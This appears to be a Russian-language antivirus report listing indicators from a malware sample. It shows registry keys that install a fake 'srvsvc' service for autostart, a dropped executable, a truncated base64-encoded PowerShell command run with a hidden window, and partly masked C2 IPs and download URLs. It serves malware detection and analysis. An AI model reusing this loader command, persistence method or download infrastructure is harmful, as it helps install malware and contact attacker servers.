Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\srvsvc] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\srvsvc] 'ImagePath' = '"<SYSTEM32>\tsdiscon\srvsvc.exe"'
- 'srvsvc' "<SYSTEM32>\tsdiscon\srvsvc.exe"
- 'srvsvc' <SYSTEM32>\tsdiscon\srvsvc.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAG8AaQA3AHgAagAwAD0AKAAoACcATgAzACcAKwAnAGIAZwAnACkAKwAoACcAcwAnACsAJwBjAHMAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABFAG4AdgA6AFQAZQBtAHAAXABXAE8AUgBEAFwAMgAwAD...
- %TEMP%\word\2019\zlcoy_4.exe
- <SYSTEM32>\tsdiscon\srvsvc.exe
- %TEMP%\word\2019\zlcoy_4.exe в <SYSTEM32>\tsdiscon\srvsvc.exe
- '17#.#1.218.65':80
- '45.#5.36.51':443
- http://ca###oomz.com/wp-includes/rPG/
- http://17#.#1.218.65/CdkjteVapw0y8/NYdwKh46g/jd6Zw8fC6ZGSFa/NKS0w/jYIwtHeUUeyxMxMt/XWvtFUMZ0Nd5hgVOI/
- http://45.##.36.51:443/HNHf8/z3D49SuOxFzWih/DNUSmpSOEeFAk/WKWxUI/Mc3VOtjedVdaMGuhf/wa9GITiUc1/ via 45.#5.36.51
- DNS ASK ca###oomz.com
- '%TEMP%\word\2019\zlcoy_4.exe'
- '<SYSTEM32>\tsdiscon\srvsvc.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAG8AaQA3AHgAagAwAD0AKAAoACcATgAzACcAKwAnAGIAZwAnACkAKwAoACcAcwAnACsAJwBjAHMAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABFAG4AdgA6AFQAZQBtAHAAXABXAE8AUgBEAFwAMgAwAD...' (со скрытым окном)